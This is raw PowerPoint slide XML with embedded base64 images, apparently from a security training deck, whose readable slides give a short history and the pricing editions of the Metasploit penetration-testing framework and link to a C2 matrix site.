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CF5F52-5B4E-7BD3-DE91-966F92F56A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575" y="4121015"/>
            <a:ext cx="4356100" cy="2646182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CBC1104-886D-34A3-EFBE-E330E33DF6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9598" y="4228212"/>
            <a:ext cx="4238078" cy="2538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DC5400E-C3A2-8960-E9BF-9E85B5434D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6353" y="1308410"/>
            <a:ext cx="4356100" cy="3073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CEA194D-EE35-2240-41C2-84D71BA43571}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="840781"/>
            <a:ext cx="31855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5"/>
              </a:rPr>
              <a:t>https://www.thec2matrix.com/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49892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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MEtasploit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52426" y="1295400"/>
            <a:ext cx="8181974" cy="5398478"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Community (Free)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Express ($3,000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Professional ($30,000)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Started in 2003 by HD Moore as a portable network tool using Perl.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2006 – Ported to Ruby.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2009 – Purchased/Sponsored by Rapid7</a:t>
            </a:r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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>De facto tool for Penetration Testing</a:t>
            </a:r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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>InfoSec Toolshed Episode:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=Dl6qNRCiPgo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,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